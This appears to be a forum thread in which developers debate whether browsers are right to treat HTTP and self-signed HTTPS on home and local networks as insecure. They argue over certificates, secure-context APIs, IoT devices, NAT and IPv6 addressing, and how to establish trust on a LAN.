The people who are pushing back against HTTPS really bug me to be honest. They say silly things like “I don’t care if people see most of my web traffic like when I’m browsing memes.”
That presumes that the ONLY goal of HTTPS is to hide the information transferred. However, you have to recognize the fact that you run JITed code from these sites. And we have active examples of third parties (ISPs, WiFi providers) inject code into your web traffic. When browsing the web with HTTP you are downloading remote code, JITing it, and running it on every site you visit if you aren’t 100% noscript with no HTTP exceptions. You have no way of knowing where that code actually came from.
Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
My primary concern are local servers ‒ which of course, are irrelevant if you are a centralised service provider such as Google.
To provide some context, I'm currently working on a web application where the server is intended to be running inside a home network (where the server requires zero configuration by the user). As of now, some of the JS APIs I'm using are only available if the site is running in a secure context, so the server has to serve the application using HTTPS, otherwise some functionality won't be available. However, it is impossible to obtain a valid TLS certificate for this local connection -- I don't even know the hostname of my server, and IP based certificates aren't a thing. So basically, to get a "green lock symbol" in the browser, the server would have to generate a random CA and get the user to install it, which comes with its own severe security risks and is not an option.
So my current plan is to have a dual-stack HTTP/HTTPS server, which on first startup generates a random, self-issued certificate. When the server is first accessed using HTTP, the client automatically tries to obtain some resources via HTTPS. If this succeeds, the user is redirected to the HTTPS variant. If it fails due to a certificate error, the user is presented with a friendly screen telling her that upon clicking "next" an ugly error message will appear, and that this is totally fine. Oh, and here's how to permanently store an exception in your browser.
Still, the app will forever be marked as insecure. Although it isn't. It is trivial for the user to verify that the connection is secure by comparing the certificate fingerprint with that displayed by the server program she just started.
This sucks. It just seems that Google and co don't care about people running their own decentralised infrastructure; and marking your own local servers as "insecure" does definitively not help.
Yes, this reminds me of the Mozilla IoT gateway from yesterday, which seemed like it pulled exactly that rat-tail of requirements behind it. Something like:
- We'd like to make an IoT gateway that you can use from a browser.
- To get access to necessary APIs, we have to provide it via HTTPS.
- The get HTTP we need a certificate. Because no one is going to pay for it, we'll use Let's Encrypt.
- To get a Let's Encryt cert, we need a verifyable hostname on the public internet. Ok, let's offer subdomains on mozilla-iot.com.
- To verify that hostname, Let's Encrypt needs to talk to the gateway. Ok, let's provide a tunnel to the gateway.
- Now the gateway is exposed to the internet and could be hacked. So we need to continously update it to close vulnerabilities.
So in the end all your IoT devices are reachable from the internet. But hey, you can use Firefox to turn your lights on!
The real solution to this would be something like TLS-SRP where you can authenticate both sides of a TLS session with a zero knowledge password proof (devices could ship with a piece of paper containing the generated password, no need for central servers, remote connections to the mothership, gateways, or certificates, or exposing stuff to the internet, or even any internet connectivity at all).
In simple terms it allows you to setup a TLS session by both sides proving they know the secret password, without either side exposing it, thus MITM is unable to capture it, it is an alternative to the cert model that works very well for network local devices.
But of course Chrome and firefox both have zero interest in supporting this use case despite TLS-SRP kicking around for ages now, they'd much rather have you connect to your own devices via a mediated cloud gateway server, for your own safety of course.
Pre-shared keys are only good for bootstrapping a stronger trust relationship. You could use TLS-SRP to exchange identities and then mutually authenticate each other for the general case. X509 is not the problem. Centrally manager trust hierarchies are.
Mozilla does though. So if their plan is to "offer subdomains on mozilla-iot.com" then they just need to set it up so that their infrastructure will fulfill the DNS challenge for the user's device when it requests a new cert.
Also: if we don't use the domain registration system to proxy for individual sites and presence on the Internet, then what alternatives might be substituted?
Note that domains don't solve the problem of a third-party controlling your point-of-access or presence, they only move it elsewhere.
I'd say that in the world we live in, getting a domain is as useful as getting a passport. It costs a bit of money to get and renew and is a bit of a hassle, but it opens a lot of doors.
This seems like it's going in circles, but, if you selfsign modern browsers display a big scary warning. If you're making a device or software meant to live behind a firewall and to be accessed from a browser, users will either have to install your CA in their browsers, or deal with the big scary warning. Both of which are bad.
> chances are that you don't provide service to normal users. Or to users at all besides yourself.
I think that's the point. Creating friction that scares normie users when people are using web UIs on local networks puts non-cloud based products at a disadvantage against the centralized giants.
Though there are a couple of technical options to make this work, the thing I realised many years ago is that if you want to use internet technology you need to be connected to the internet. Anything else is just an endless headache.
If you are sure that you don't want your IoT devices to be reachable from the internet, don't use the internet protocol to talk to them, don't use DNS, web browsers, etc.
Just create a new local protocol (or switch back to IPX)
It really feels like you're throwing in the towel. The internet is designed specifically to allow federation between forests of hosts. That's what routers do. Browser vendors need to get their heads out of the fucking cloud and stop coercing people into relying solely on global TLS. I think TLS is wildly misunderstood. The whole global certificate thing only works for global communication. Global hosts should be your first point of contact and from there you should be able to leverage global TLS to bootstrap more intimate trust relationships... to make informed decisions about the trust relationships you want to establish. Browsers need to facilitate this not do everything possible to prevent you from owning your trust. If your browser is only able to communicate globally that's not the internet's fault. It's not TLSs fault (TLS is designed to allow clients to choose who they trust). That a failure of your browser to support your diverse use case.
If you like tilting at windmills then go ahead. Since forever people have written software that assumes a global internet.
However today the situation is much worse. The global internet is a very hostile environment. Everybody who writes software that has to work on the internet has to assume the worst.
If there are modes in a piece of software that assume the network can be trusted, then you can be sure that some attacker will try to activate that mode.
You cannot assume that the users of a piece of software have any idea how the internet works. If they can solve an immediate problem by disabling security, they will.
So, over time just about any piece of software that wants to support secure use on the internet will come with built-in trust anchors that are very hard to change.
In browsers this trend is quite visible. But the same trend, though less visible is going on in DNS.
E-mail is a bit of a mess. But the basic features are there. Just not a lot of adoption.
To sum it up, users don't want to know about internet security. They want their devices to work securely at a random open wifi network. Devices have a hard time figuring out if they are in a trusted environment. So the best way forward is to assume all environments are untrusted and require encryption everywhere.
My issue was with you suggesting people abandon security if they don't want a public internet connection.
I think the global TLS system works great when you're in a global context. But now the internet has proliferated and it's infecting people's homes. It turns out people _don't want_ to be in that hostile global context when they're at home. They want a context that is private. They want to isolate their home from the firehouse of global bullshit out there.
I think we've passed an inflection point and we're seeing a revival of attention to home networking. Sure for the last 15 years all I connected to my wifi was my laptop and that's pretty useless without the global internet. But now people have IoT things. Door locks, ovens, toilet paper, you name it. Why the hell would anyone want those things phoning home to a remote server all the time? Why does it even need to be publicly routable? Maybe it does need limited connectivity so strong interactive controls allowing you to federate whatgoes in and out are necessary. More than ever the _integrity_ of your home is also the integrity of your network. Your network is an appliance now. It is the lifeblood of your home.
People deserve to be able to administrate their personal enclaves as they see fit and do it securely. The best way to prevent someone from remotely unlocking my doors is to eliminate the remote path to the door lock. Did you forget that we've come rather far in securing later 2? People _can_ and _should_ trust their home network. Not wrecklessly, but private networks are not a fairy tale.
Finally finally, don't patronize users. The users of today are tomorrow's grandmas. It's not unreasonable to expect we can slowly adapt user expectations and understanding surrounding the security of their software. I'm not saying you don't have a point, but I think it's a disservice to users to treat them all like idiots.
> They want a context that is private. They want to isolate their home from the firehouse of global bullshit out there.
With all due respect, over the past fifteen years of trying to secure corporate networks, we've learned the hard way that this simply isn't a realistic goal. Having a hard outer shell and a squishy center just leaves the entire network vulnerable, because it's simply not possible to isolate yourself from the badness of the outside world. As soon as you let anyone in who's ever spoken to the hostile outside world, they bring the hostile outside world in with them.
We can't keep pretending that we can keep home networks isolated from the rest of the world when many of the computers in those networks move freely between the global Internet and the private home intranet. All connected devices are part of the global Internet whether or not we want them to be, and whether or not their connections are persistent.
I think we're arguing similar things. I'm not saying we only need a hard outer shell. I'm arguing that we _need_ security in depth. And that depth should include all scopes of the internet protocol, not just global. You _should_ be able to run TLS locally so that if some global thing does get in, it now has to penetrate another security/application layer too. I should be able to tell my browser to trust these certificates for global IPs and these other ones for my home site. Why not run IPSEC in you home while you're at it too so it's even harder for a remote thing to pivot.
People can administrate their personal enclaves as they see fit. There are a number of operating systems that you can rebuild from source. You can just create your own root CA and add it to your browsers. You can run your own root DNS zone.
Most people have no clue about computer security and don't want to get one. Tomorrow's grandmas will know as little about how their computers are attacked as today's grandmas.
And they don't want to know. They want technology that is safe to use.
We know from experience that a network where devices trust each other is a disaster waiting to happen. So let's kill that model. All devices have to survive in the open internet. Because if they don't, somebody will figure a way to attack them.
I think we're talking past each other at this point. I want security both globally and locally. I want to be able to tell my browser who it should trust and what level of paranoid it should be in each context. If I go through the work of recompiling a bunch of software with custom trust anchors, I don't want it to all be for naught because in the last mile my browser says "I'm lost I only understand global TLS".
I LOVE the idea of NAT-less global internet. It's why I love IPv6. At that level anything that wants to participate should be secure and "go Chrome" for leading the charge. I even think firewalls for global IPv6 are stupid. If you're global you're global no amount of silly packet filtering rules is gonna change that.
But that's not the end all. I don't want my entire house to stop working because I got a new ISP and I have a few days of down time. Or more like because my ISP went down because they oversell bandwidth and haven't updated their routing hardware in 15 years. Maybe I don't want my file server with all my family photos globally addressable. Maybe I don't want my kids on the global internet at certain times. The point is I know what's best for my house. Im sick of the old IPv4 mindset where the only reasonable model is centralized global trust (see we agree that's been the status quo).
> Global hosts should be your first point of contact and from there you should be able to leverage global TLS to bootstrap more intimate trust relationships... to make informed decisions about the trust relationships you want to establish.
Part of setting up an account with a web service or iot device provider or whatever should be acquiring their certificate authority. However, instead of having a single bucket OS level root trust store, browsers empower users to whitelist the sites they trust that authority to well have authority over. You trust googles ca for google.com. Or maybe you don't.
At the application level, trust should be managed by the application provider and the user. Their certificate authority can issue whatever certificates it wants for whatever kind of network topology or application use cases or whatever else they need to support. As a user you're either still using a browser or you've at this point switched to their native app or you've got their JS helpers loaded or whatever. Their application logic can manage all the certificate crap so that users are minimally encumbered by it. If you're talking to local network devices their application logic would issue certificates for whatever scope of IPv6 addresses you're using. Maybe your fancy device is running dns, their thing issues certs for your scope's site, etc.
You can even do mutual TLS now because their authority can issue installs of their app their own certificates. Browsers should support client certs too. Navigating to foo.com using a scoped IPv6 address? You're prompted to select the identity you wish to use. Your browser remembers your choice for that scope. The CA is only valid for your blessed names, scope aware.
> Their certificate authority can issue whatever certificates it wants for whatever kind of network topology or application use cases or whatever else they need to support.
But that means that other customers can get a trusted certificate for the exact same ip address, right?
> If you are sure that you don't want your IoT devices to be reachable from the internet, don't use the internet protocol to talk to them, don't use DNS, web browsers, etc.
What utter nonsense.
TCP/IP works fine on a local network
DNS works fine on a local network
HTTP(S) works fine on a local network
Web Browsers work fine on a local network
After all the internet is nothing more than a collection of connected networks.
If I have no need for anything within my local network (or subset of that network) to be routable from the internet then I put a firewall in the way, it doesn't mean I don't use the same tools and protocols.
TCP/IP on a local network will make mobile devices think they are on a captive portal.
DNSSEC will prevent you from serving local answers for signed zones. The DNS root zone is signed. So the IETF at the moment has a hard time figuring out which zones need to stay not signed to allow these kinds of local answers.
HTTP is not secure, so that is going the way of telnet.
HTTPS is what we are discussing here. Without a valid cert, don't expect browsers to support you much longer.
Yes, you can create your own little internet island. But don't complain if any software fails to work in that environment.
> TCP/IP on a local network will make mobile devices think they are on a captive portal.
No, that's the phone doing a HTTP call to a server on the internet to try and work out if it's a captive portal, all TCP/IP still functions perfectly fine within an internal network with no WAN access.
> DNSSEC will prevent you from serving local answers for signed zones. The DNS root zone is signed. So the IETF at the moment has a hard time figuring out which zones need to stay not signed to allow these kinds of local answers.
The devices are on a local network, they're not making requests to things outside the network. Even if you do need outside access for resolution you can still happily use a DNS forwarder with your local DNS served up locally with any outside DNS (including DNSSEC) queries being forwarded where they need.
> HTTP is not secure, so that is going the way of telnet.
That's neither here nor there, it still works fine in the context of a local network.
> HTTPS is what we are discussing here. Without a valid cert, don't expect browsers to support you much longer.
A cert is as valid as my cert store thinks it is, again, still works on an internal network.
> Yes, you can create your own little internet island. But don't complain if any software fails to work in that environment.
By "own internet island" you mean a local network? Sure it's more advanced than your nan's local network but it's still a local network in which the IP part of TCP/IP still works absolutely fine. Maybe you come from the land where your mongo instance needs a public IP, or that your lightbulbs can be used to pivot onto your home network. I don't. This is basic network design. Maybe the shitty software/hardware you're running shouldn't assume it will always be connected to the internet directly.
The goal is that you can build a device that your grandma can put at home, which never connects to a remote server, which she can connect to from her browser, which just works, never shows an annoying HTTPS warning, never requires enabling custom CAs, and provides all functionality of the browser, without being marked as "not secure".
That is the goal: All the functionality of e.g. a Nest device, without ever sending a single packet outside of your LAN.
(Disclaimer: For my own IoT projects, of course I use a special domain with DNS delegation and Let's Encrypt certificates, and HSTS preloaded)
> never connects to a remote server, which she can connect to from her browser, which just works, never shows an annoying HTTPS warning, never requires enabling custom CAs, and provides all functionality of the browser, without being marked as "not secure".
Right, do you have a proposal for how to accomplish this? If you don't want to require an internet connection, I think trusting a self-signed cert is the best way to go, otherwise owning a domain name + letsencrypt is good if you're ok connecting to the internet.
What I think could really do good is some browser-supported protocol specifically made for identifying devices on a LAN.
E.g., imagine some UPnP-style broadcast where a device announces a public key, human-readable name and some type/capability information.
Browsers listen for broadcasts and show users a notification once they discover an unseen device. Once confirmed, they can identify the device by its public key and also use it to establish encrypted connections.
You could also define out-of-band methods to share the key, e.g. via an on-device wifi hotspot, NFC, a USB plug or a QR code printed on the device.
Mozilla's Web-of-Things spec seems to show at least a willingness to work on this. Though right now they seem to re-solve exactly all the already solved problems and tackle none of the unsolved.
...or you could simply treat HTTP in local networks as a secure origin and be done with it.
I agree, though instead of "public key" I would just say "self-signed cert".
> ...or you could simply treat HTTP in local networks as a secure origin and be done with it.
I think this is a lot harder than it sounds. What's a "local network". Is a coffee shop or public wifi a local network? How does the browser know? How do you know a rogue IoT device isn't doing ip spoofing?
Right, yeah, browsers are not guaranteeing any security on the local network.
If self-signed is not an option, then I think an internet connection and domain name are required. (Which seems to me is totally fine. That's the whole point of IoT)
I totally agree. Either have it securely connected to the internet, or not at all. The fact that something is on your LAN is just an implementation detail and shouldn’t be relied upon for security.
Is the fact that your physical door locks and keys are only unique to your local region very much an implementation detail? No it's not. It's conceptually the same, but keys and locks are not globally secure. They're only locally secure.
Also IPv6: everything gets a globally routable address. Great so why do we need anything else? Well it turns out that in order to support all the different modes of network operation and all the different topologies and use cases, the Internet Protocol needs to support non-global scopes too. Arguing you can't have e.g. link-local security is absurd and rally quite green, from a networking professionals perspective.
Oh also IPSEC is part of IPv6 not just an afterthought like it was for IPv4. This makes it even more likely we'll see trusted network scopes sooner rather than never.
That is basically my point. People need to have ways to create local enclaves so it's impossible for packets to ever make their way into your zone. And wonxe you do that, local security is perfectly reasonable and desirable.
HTTPS only protects data in transit from the server to your device. A local network work just fine for providing the same protection. It's not like an internet attacker can spoof a 192.168.x.x address on my LAN, or sniff the traffic to or from my server.
Possibly a rogue IoT device could spoof an ip address. But that's probably not going to happen to someone who knows what they're doing. Browsers don't know if the network is trusted and can't assume that LAN IPs are safe.
It seems to me the best options are either trusting a self-signed cert (on every computer that needs access) or pay for a domain name and use letsencrypt to get a cert. I do think it's unfortunate that you now need to pay money just to do things like this on your own network, but I don't see a better way. It's either paying for a domain name or needing to explicitly trust the device.
I don't think there's a way to do what you want in a secure manner.
I think fundamentally your issue here is with secure contexts, not with the site labeling. In the end, you can have a site like you describe, but you have to avoid using APIs that require secure contexts.
Any sort of avoidance of this, as by the method you describe ("please ignore the ugly warning you are about to see") is a mistake, because you're helping to train the users to ignore these messages.
> Still, the app will forever be marked as insecure. Although it isn't. It is trivial for the user to verify that the connection is secure by comparing the certificate fingerprint with that displayed by the server program she just started.
Is it, though? Assuming your server hasn't been compromised (nobody is monitoring it to make sure!), and assuming that the self-signed cert cannot be easily exfiltrated, and assuming that they don't do the same thing the next time they get an ugly warning from chase-bank.ru because they're sure that it's spurious -- then maybe?
> In the end, you can have a site like you describe, but you have to avoid using APIs that require secure contexts.
While that might be an option now, it's not going to be viable. Browser vendors have agreed to make all new JS APIs -- mostly independent of their security implications -- available to secure contexts only [1]. Even now, you cannot use the Crypto API -- which is entirely implementable in plain JS, albeit slower and with higher energy consumption -- without secure contexts. Or you cannot raise the IndexedDB storage limit for your application above a certain threshold without a secure context (which is exactly my problem, I want users to be able to temporarily store a few hundred MB on their mobile device).
> Any sort of avoidance of this, as by the method you describe ("please ignore the ugly warning you are about to see") is a mistake, because you're helping to train the users to ignore these messages.
I completely agree. I understand the implications of me doing this and I honestly don't want to.
I guess what I'm complaining about mostly boils down to an UX issue. It would be near-trivial for browser vendors to add the following to the error page if they detect a self-signed cert on a local connection: "This site seems to be served from the local network. If you are trying to access your own network infrastructure, please make sure the following fingerprint matches the one displayed by the application you are trying to access <fingerprint>, <autogenerated fingerprint art>. If you are unsure, please click 'Cancel'.".
That would solve the problem, no landing page from my application required.
> Is it, though?
You're right, there are a lot of assumptions I'm making here. However, I see no reason why my local HTTPS site should be displayed as less secure (red cross, red text in the URL bar) than a local HTTP site.
> I see no reason why my local HTTPS site should be displayed as less secure (red cross, red text in the URL bar) than a local HTTP site.
Exactly, that's why browsers are trying to move in the direction of making HTTP sites appear as less secure.
> I guess what I'm complaining about mostly boils down to an UX issue. It would be near-trivial for browser vendors to add the following to the error page if they detect a self-signed cert on a local connection: "This site seems to be served from the local network. If you are trying to access your own network infrastructure, please make sure the following fingerprint matches the one displayed by the application you are trying to access <fingerprint>, <autogenerated fingerprint art>. If you are unsure, please click 'Cancel'.".
I totally agree it's a UX issue, but I don't see a good solution. Unfortunately your browser doesn't know if you're on "your own network infrastructure" and not at a coffee shop. It needs to be on the safe side and assume it's not a trusted network.
Maybe the browser should require you to type in the fingerprint of the key.
Wow -- you're right, the overreach in "secure contexts" is astonishing. It looks like [1] is the main thread discussing this policy. The notion of "internal/isolated network services" is mentioned in one comment but never address, other than pointing out the difficulty of getting a cert for such a service. I think it's probably worth jumping into that discussion before the policy is set in stone.
Thinking on this further, the storage one makes sense for secure contexts, because allowing that for insecure contexts would mean that by spoofing the DNS of a site, I could steal its information. I'm not certain how secure the data that you store would be, but if it were, say, camera footage or something, it would be possible for it to be extracted from the user's phone by a malicious website out of your control.
I don't know if this problem is soluble -- at least a self-signed certificate would mean that the certificate would have to be exfiltrated in order to do this, assuming the browsers key the indexedDB to the certificate fingerprint, which would indicate a degree of compromise that most likely means that the data could be stolen directly from the device.
If you don't mind being more specific, what kind of data would you be storing on the phone? Is it just for caching purposes? It seems like it might be better for the data to be fetched from the device on demand rather than stored on the phone, even if this causes a performance hit, to avoid the possibility of leaking the data to untrusted parties.
> If you don't mind being more specific, what kind of data would you be storing on the phone?
Sure, my particular use-case is a media management/playback application (think web-based audio player; like Plex, Ampache, Spotify) that is intended to be used with a large personal library of audio files (in the order of a hundred thousand files, about 1 TB of data). The application has an offline-mode (via ServiceWorkers, everything being REST, content addressed and infinitely cacheable), where the connected client can request to "pin" a certain playlist/filter. Upon request, all media files with that filter will be transcoded/downloaded onto the client and are available even when having no connection. So it's not really any data that needs to be kept secure (still, all media blobs are encrypted anyhow to allow public caching -- for internet hosted instances -- without having to fear IP issues).
Let's maybe hope that they'll make an exception for the RFC1918/4193 ranges. Of course, the other side of the coin of is that even a "private" network could be anything from your private home to your workplace intranet to an airport wi-fi hotspot, and can't be assumed to be safe from snooping/injection.
As for your particular hassle, it makes sense to me for a browser to mark sites that mix http/https as insecure from the point of view that once the data is on the plain http page you can no longer be sure that it won't be handed off over an unencrypted connection some place else by some rogue javascript.
Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks. Say, a method for routers to discover certificates announced by devices on the network to list them in its management interface where you can enable or disable them.
> Let's maybe hope that they'll make an exception for the RFC1918/4193 ranges. Of course, the other side of the coin of is that even a "private" network could be anything from your private home to your workplace intranet to an airport wi-fi hotspot, and can't be assumed to be safe from snooping/injection.
That would be idiotic not just because unrusted parties can use those addresses, but more importantly because those are more or less terrible hacks that should be avoided completely if possible. You rather should have globally unique addresses on your internal network if you can, which would just break this.
> Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks.
That's also not sensible. The whole idea of linking stuff to specific networks is bad. There is no reason why access to a device on your home network should in any way be linked to your client device being connected to that same network. It's the internet, not "the home network and the cloud".
What is needed is a way to establish a trust relationship between two devices that you have control over. Where those devices happen to be connected to the internet should be absolutely irrelevant. There might be an argument to be had to maybe support for a simplified peering procedure on a local network might be a good idea--but the point is that once the trust trelationship is established, you should be able to move your client device to a different network on the other side of the planet and still be able to talk to your device on your home network.
> but more importantly because those are more or less terrible hacks that should be avoided completely if possible
Seems quite unavoidable with IPv4, or what is the hack you're referring to specifically?
> That's also not sensible. The whole idea of linking stuff to specific networks is bad. There is no reason why access to a device on your home network should in any way be linked to your client device being connected to that same network.
What is the reason against? It's not like the idea of a privately managed network in which you trust all peers is novel or rare. Most people have a network in their home that they manage for themselves or for their family. It's the perfect scope for IoT devices.
> It's the internet, not "the home network and the cloud".
That's an interesting notion, but unfortunately does not reflect reality of use or the design of existing internet protocols, or even the very core concept of the internet: interconnected networks. I have a private network at home. My means to connect devices on this network to the internet is via a gateway which is assigned a single globally unique internet address by my service provider, and a locally unique address on the private network.
If at some point every device has its own global address and is accessible globally, it will be more accurate to assume that something is insecure if it communicates in the plain, but we're not there yet. What the browser is doing now is pretty much assuming an arbitrary level of "better safe than sorry".
> What is needed is a way to establish a trust relationship between two devices that you have control over.
Say, by sharing sharing keys over a network under your control, certified and authorized by a device you trust for pretty much everything else on that network?
> Where those devices happen to be connected to the internet should be absolutely irrelevant.
Agreed, but the current conundrum is that they need to be connected to the internet if you want to use a central certificate authority.
> Seems quite unavoidable with IPv4, or what is the hack you're referring to specifically?
Well, yes, for most people it unfortunately is. But imagine if your are one of the lucky ones who do have global IPv4 addresses everywhere. And now someone sells you a product that tells you "sorry, nice IPv4 network that you have there, but you have to install NAT and an RFC1918 network to use this IPv4 product". Not very sensible, is it? Same applies for IPv6 and ULA, obviously.
> What is the reason against?
What would be a reason for limiting the usefulness of your devices?
> It's not like the idea of a privately managed network in which you trust all peers is novel or rare.
Which is fine, but not a sensible assumption to make in an IP product. If you want to use it in a privately managed, trusted network, of course you should be able to, but the idea that an IP device should just refuse to work over IP if your IP happens to extend beyond your LAN is idiotic. That should be a matter of the network's policy, not of the device's hard-coded policy.
> That's an interesting notion, but unfortunately does not reflect reality of use or the design of existing internet protocols, or even the very core concept of the internet: interconnected networks.
Erm ... that's completely backwards? It unfortunately does not reflect the current use of IPv4 in particular due to NAT everywhere, but that certainly was not part of "the design of existing internet protocols", that was a hack due to lack of addresses.
What was before the internet were separate local (and sometimes not so local) networks: You had all kinds of link-layer protocols, and then various higher-level protocols, usually specific to a given link-layer. The whole point of the internet was to add a common abstraction to all of those link layers protocols, precisely to eliminate any distinction between local or remote, ethernet or token ring, modem or ISDN, GSM or CDMA, an addressing layer that erased the distinction: If you had an IP address and the thing you wanted to communicate with had an IP address, you could, even if you were on token ring, your WAN link was ISDN, the backbone was ATM, the peer's WAN link was a dial-in modem and their LAN was ethernet. The point of IP is that you don't have to care, any IP address is as good as any other.
> I have a private network at home. My means to connect devices on this network to the internet is via a gateway which is assigned a single globally unique internet address by my service provider, and a locally unique address on the private network.
Well, yes, unfortunately, that is the case nowadays. That is not how IP was meant to be used, and it's causing massive problems. If it weren't for lack of addresses, your home network should have a globally unique /24 or something (and it did, back in the day).
> If at some point every device has its own global address and is accessible globally, it will be more accurate to assume that something is insecure if it communicates in the plain, but we're not there yet. What the browser is doing now is pretty much assuming an arbitrary level of "better safe than sorry".
Not sure I am getting your point!?
> Say, by sharing sharing keys over a network under your control, certified and authorized by a device you trust for pretty much everything else on that network?
Well, arguably you totally should not trust your router, they tend to be crap security-wise.
But in any case, my point was that at most that should be a pairing mechanism. So, once the trust relationship is established, there should be no need to stay on the local network for further secure communication.
> Agreed, but the current conundrum is that they need to be connected to the internet if you want to use a central certificate authority.
Well, yes?! But the solution is not to hard-code policies that prevent full use of IP.
> Well, yes, for most people it unfortunately is. But imagine if your are one of the lucky ones who do have global IPv4 addresses everywhere. And now someone sells you a product that tells you "sorry, nice IPv4 network that you have there, but you have to install NAT and an RFC1918 network to use this IPv4 product". Not very sensible, is it? Same applies for IPv6 and ULA, obviously.
Are you arguing from the assumption that my suggestions and any other form of establishing trust are mutually exclusive? If you're that lucky guy with a global address for your lightbulb, by all means use what's at your disposal to establish a trusted encrypted link between the device and the user in a convenient way. Not sure how that would prevent the vast majority using these on private networks with a different method of authentication and different criteria for trust.
> Erm ... that's completely backwards? It unfortunately does not reflect the current use of IPv4 in particular due to NAT everywhere, but that certainly was not part of "the design of existing internet protocols", that was a hack due to lack of addresses.
So, given the limited address range, it was clearly not designed for every person in the world to have an address, not to mention every appliance in your kitchen. The internet has grown rather organically and has adopted a broader use case. The infrastructure, protocols and best practices used on the internet now reflect this unanticipated use case.
> Well, yes, unfortunately, that is the case nowadays. That is not how IP was meant to be used, and it's causing massive problems. If it weren't for lack of addresses, your home network should have a globally unique /24 or something (and it did, back in the day).
How it was meant to be used is an artefact that stopped mattering some time in the 80s.
> Not sure I am getting your point!?
The point is that flagging plain http websites as "unsafe" makes a lot of assumptions about my network. They're not necessarily unsafe. In one case, it's on my apartment-wide LAN. In another case, it's connected by ethernet directly to the client. Neither of these are particularly exotic topologies.
> But in any case, my point was that at most that should be a pairing mechanism. So, once the trust relationship is established, there should be no need to stay on the local network for further secure communication.
Why not both?
> Well, yes?! But the solution is not to hard-code policies that prevent full use of IP.
Agreed? I'm not sure where you got the idea that I think that any of these things should prevent the full use of IP. Certainly not from anything I've said.
> Are you arguing from the assumption that my suggestions and any other form of establishing trust are mutually exclusive? If you're that lucky guy with a global address for your lightbulb, by all means use what's at your disposal to establish a trusted encrypted link between the device and the user in a convenient way.
Well, if that were a standardized way to establish trust, that necessarily would lead to vendors adopting it at the cost of suporting other kinds of setups?
Also, it is very problematic to overload not globally routable addresses (also often misleadingly called "private addresses") with security semantics. While many home setups do have a sort-of security boundaries around RFC1918 subnets, there is absolutely no guarantee that that is the case. So not only would such a mechanism break "sane" (i.e., NAT-free) setups, it also would make otherwise perfectly fine and useful setups risky. Have a VPN link to another company that also uses RFC1918 space or ULA, and suddenly your IoT stuff starts trusting that other company. Or even just if you happen to have departments that aren't supposed to trust each other, and that happen to have a common ULA prefix, and now some devices simply assume trust where none is implied/make it impossible to use otherwise perfectly fine setups because of unjustified trust assumptions. Or simply a guest on your network. Or ... whatever else that can share non-globally routed address space with you without any trust implied.
> So, given the limited address range, it was clearly not designed for every person in the world to have an address, not to mention every appliance in your kitchen. The internet has grown rather organically and has adopted a broader use case.
Well, yes, but that wasn't because it was intended to be used with NAT, or anything else that was not a globally routable address for every device, but because it wasn't expected to gain that many users.
> The infrastructure, protocols and best practices used on the internet now reflect this unanticipated use case.
Which is an argument for what exactly? Especially with regards to IPv6 and ULA?
> How it was meant to be used is an artefact that stopped mattering some time in the 80s.
Why would that have stopped then? Again, in particular with regards to IPv6, which does not have the address scarcity that might have justified use of NAT and non-globally routed address space as a temporary workaround?
> The point is that flagging plain http websites as "unsafe" makes a lot of assumptions about my network.
... just as not doing so does? If anything, it would be arbitrary to just exempt certain prefixes from security policies when there is not normative basis for such an exemption. I happen to have only globally routable IPv6 addresses on my LAN, but my LAN is indeed trusted, both wired and WiFi, using distinct /64s. But I also have a guest WiFi that is in the same IPv6 /48, which is not trusted. And I have a VPN link to a customer of mine that uses RFC1918 address space, which is absolutely not trusted.
So, yes, it is "better safe than not safe". But it's exactly the opposite of arbitrary, in that it does not make any assumptions about your network, it provides security no matter what the details of your network, and using the exact same policy for everything. And it's hardly "better safe than sorry", given that this is all a result of being very sorry about all the crap that resulted from lack of security so far.
> They're not necessarily unsafe. In one case, it's on my apartment-wide LAN. In another case, it's connected by ethernet directly to the client. Neither of these are particularly exotic topologies.
Yeah, and how is your browser supposed to know that?
> Why not both?
What both?!
> Agreed? I'm not sure where you got the idea that I think that any of these things should prevent the full use of IP. Certainly not from anything I've said.
The question is not whether it should, but whether it would. Suppose browsers were to implement a policy of "RFC1918 and ULA are considered safe unencrypted and -authenticated". What would vendors of devices do? I guess we can agree that they would use that policy for config access, as it simplifies the design of their devices, right? Now, that would cover 99%+ of their current user base. Which probably means they won't bother providing an alternative mechanism. Which means (a) you can't use their devices in other setups and (b) their users are locked into such setups, which makes it impossible for, say, router vendors, to build more useful networking products that use the full potential of IP.
> Well, if that were a standardized way to establish trust, that necessarily would lead to vendors adopting it at the cost of suporting other kinds of setups?
So on one hand you believe that supporting one standard will necessarily come at the cost of supporting another (I don't), and you agree that what I suggested might cover 99%+ of the current user base, yet you favor a solution that depends on global addresses, something which definitely doesn't come close to 99% of potential users?
> Also, it is very problematic to overload not globally routable addresses (also often misleadingly called "private addresses") with security semantics.
Well, if you want to be really anal about it you could call them "addresses which fall into one of the address ranges allocated for private use", but you're just splitting hairs.
> While many home setups do have a sort-of security boundaries around RFC1918 subnets, there is absolutely no guarantee that that is the case.
There is no guarantee, but that's different from saying that it's inherently unsafe.
> Which is an argument for what exactly? Especially with regards to IPv6 and ULA?
It's a reflection on how the internet is built. It doesn't matter that in the ideal network, everything might have an address, when pretty much every device is behind some kind of NAT. IPv6? Come back when it's widely adopted.
> Why would that have stopped then? Again, in particular with regards to IPv6, which does not have the address scarcity that might have justified use of NAT and non-globally routed address space as a temporary workaround?
It stopped mattering because of address exhaustion and slow adoption of IPv6. Now, NAT is an integral part of the internet. I'm not trying to justify it or state this as a matter of preference—I'd definitely prefer having a ton of IPv6 addresses over the single IPv4 address I actually have—I'm just laying things out as they are, and how they are for the vast majority of consumers.
> ... just as not doing so does?
No. Flagging a website as "safe" when it can not be established that it is safe is at least as wrong as flagging it as "unsafe" when it can not be established as being unsafe. What I'm suggesting, not flagging it in any particular way at all, would be taking a neutral stance. IMO, the practice of calling HTTPS sites "secure" is itself potentially misleading to consumers. It is only secure in a very specific sense, likely not in the broader sense a layman would consider.
> Yeah, and how is your browser supposed to know that?
The question I stop at is "why is my browser supposed to know that?"
> What both?!
Both a way of verifying and distributing certificates network-wide in a LAN and for those certificates to be usable globally.
> The question is not whether it should, but whether it would. Suppose browsers were to implement a policy of "RFC1918 and ULA are considered safe unencrypted and -authenticated". What would vendors of devices do?
The premise of my suggestion is that the browsers won't back down from indiscriminately marking plain HTTP sites as insecure, hence "Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks."—so suppose they would support such a method. Would that be better or worse than current practice?
